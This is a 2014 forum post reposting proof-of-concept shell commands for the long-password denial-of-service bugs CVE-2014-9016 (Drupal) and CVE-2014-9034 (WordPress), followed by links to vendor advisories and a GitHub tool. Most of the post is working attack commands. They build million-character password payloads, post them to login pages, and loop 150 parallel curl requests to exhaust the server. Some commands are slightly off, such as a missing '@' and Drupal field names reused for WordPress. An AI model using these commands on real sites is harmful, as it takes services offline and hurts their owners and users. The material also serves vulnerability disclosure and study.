devilox Posted December 10, 2014 Report Posted December 10, 2014 (edited) Drupal Denial of Service CVE-2014-9016Generate a pyaload and try with a non-valid user:$ echo -n "name=NO-VALID-USER&pass=" > no_valid_user_payload && printf "%s" {1..1000000} >> no_valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> no_valid_user_payload$ time curl --data @no_valid_user_payload http://yoursite/drupal/?q=user --silent > /dev/null &Generate a pyaload and try with a valid user:$ echo -n "name=admin&pass=" > valid_user_payload && printf "%s" {1..1000000} >> valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> valid_user_payload$ time curl --data valid_user_payload http://yoursite/drupal/?q=user --silent > /dev/null &Perform a Dos with a valid user:$ for i in `seq 1 150`; do (curl --data valid_user_payload http://yoursite/drupal/?q=user --silent > /dev/null &); sleep 0.25; doneWordpress Denial of Service CVE-2014-9034Generate a pyaload and try with a non-valid user:$ echo -n "log=NO-VALID-USER&pwd=" > payload && printf "%s" {1..1000000} >> payload && echo -n "&wp-submit=Log In" >> payload$ time curl --data @no_valid_user_payload http://yoursite/wordpress/wp-login.php --silent > /dev/null &Generate a pyaload and try with a valid user:$ echo -n "name=admin&pass=" > valid_user_payload && printf "%s" {1..1000000} >> valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> valid_user_payload$ time curl --data valid_user_payload http://yoursite/wordpress/wp-login.php --silent > /dev/null &Perform a Dos with a valid user:$ for i in `seq 1 150`; do (curl --data valid_user_payload http://yoursite/wordpress/wp-login.php --silent > /dev/null &); sleep 0.25; donePython Codehttps://github.com/c0r3dump3d/wp_drupal_timing_attackReferencesWordpress Denial of Service Responsible Disclosure - Attacking with long passwords ~ Hacking while you're asleepDrupal Denial of Service Responsible Disclosure - Attacking with long passwords ~ Hacking while you're asleepTiming Attack and the importance of controlling the length of the input – The Case of Drupal CVE-2014-9016. | # /dev/consolehttps://wordpress.org/news/2014/11/wordpress-4-0-1/ https://www.drupal.org/SA-CORE-2014-006 https://www.drupal.org/node/2378367NVD - DetailNVD - DetailSource : CVE-2014-9016 and CVE-2014-9034 Proof of Concept ~ Hacking while you're asleep Edited December 10, 2014 by devilox 1 Quote